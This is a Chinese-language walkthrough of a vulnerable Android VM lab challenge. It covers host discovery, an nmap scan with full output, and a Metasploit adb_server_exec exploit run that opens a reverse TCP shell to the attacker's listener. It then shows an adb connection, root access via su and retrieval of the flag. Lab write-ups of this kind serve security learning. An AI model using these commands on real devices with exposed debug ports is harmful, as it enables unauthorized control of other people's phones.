Android4 漏洞環境簡單挑戰
- 2019 年 10 月 6 日
- 筆記
今天給各位分享的是一個Android虛擬機環境的簡單滲透。按照我們一般的滲透流程大概分為:
- 端口掃描和IP發現
- 使用adb_server_exec攻擊端口8080代理
- 使用ADB連接到設備。
- 獲取shell
- 權限提升
開機是一個唯美的畫面
要輸入pin碼!
首先進行ip地址發現,kali中使用netdiscover掃描
netdiscover -r 192.168.0.0/24
然後使用nmap進行全面綜合的掃描
nmap -p- -A 192.168.0.104 root@kali:~# nmap -p- -A 192.168.0.104 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-08 17:49 CST Nmap scan report for 192.168.0.104 (192.168.0.104) Host is up (0.00051s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 5555/tcp open freeciv? 8080/tcp open http PHP cli server 5.5 or later |_http-open-proxy: Proxy might be redirecting requests |_http-title: Deface by Good Hackers 22000/tcp open ssh Dropbear sshd 2014.66 (protocol 2.0) | ssh-hostkey: |_ 1024 b3:98:65:98:fd:c0:64:fe:16:d6:30:36:aa:2b:ef:6b (DSA) MAC Address: 00:0C:29:6F:D3:B3 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.51 ms 192.168.0.104 (192.168.0.104) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 181.05 seconds root@kali:~#
訪問一下8080,沒啥額外的信息
似乎是PHP的CLI,嘗試了一下也沒有找到啥關鍵內容。
繼續回看nmap的掃描結果,發現22000是ssh服務,對應的軟件是Dropbear sshd 2014.66 (protocol 2.0),用度娘搜了一下這個應用
再用exploitdb對應的searchsploit命令搜了一下
searchsploit Dropbear
沒法利用!最後就剩下一個5555端口應用了。
在Android系統中,TCP的5555旨在允許通過Android調試橋(ADB)管理設備,這是一種Android SDK功能,允許開發人員輕鬆地與設備通信並在其上運行命令或完全控制它們。
在我本地之前安裝的Android開發環境中,我將一台老版本的手機root之後,連接到電腦上,配置好Android Studio環境(此處省略,可度娘簡單了解一下),如下圖所示:
可以看到,我們通過adb shell命令即可進入Android設備的交互模式中。所以在這裡,開放的5555端口會被認為是一個服務端口,我們可以利用此端口的特性進行攻擊。
在kali下開啟msfconsole使用adb服務模塊進行測試
msf5 > use exploit/android/adb/adb_server_exec msf5 exploit(android/adb/adb_server_exec) > set rhosts 192.168.0.104 rhosts => 192.168.0.104 msf5 exploit(android/adb/adb_server_exec) > set lhost 192.168.0.105 lhost => 192.168.0.105 msf5 exploit(android/adb/adb_server_exec) > set lport 4567 lport => 4567 msf5 exploit(android/adb/adb_server_exec) > exploit [*] Started reverse TCP handler on 192.168.0.105:4567 [*] 192.168.0.104:5555 - Connecting to device... [+] 192.168.0.104:5555 - Connected to device: device::ro.product.name=android_x86;ro.product.model=VMware Virtual Platform;ro.product.device=x86; [+] 192.168.0.104:5555 - Command executed, response: command=WRTE arg0=0x1 arg1=0xb data= [*] 192.168.0.104:5555 - Command Stager progress - 100.00% done (1338/1338 bytes)
如果沒有Windows的Android開發環境,那就在kali下連接,安裝adb
apt-get install adb
安裝完成之後連接,使用adb命令連接
root@kali:~# adb connect 192.168.0.104:5555 connected to 192.168.0.104:5555 root@kali:~# adb shell
使用su命令即可切換到root身份
在/data/root/目錄中發現了設置的flag文件
至此,我們的利用過程完畢!
總結
手機還是不要輕易root,一般root之後,在局域網之內一旦被掃描到,很容易被攻擊成功。
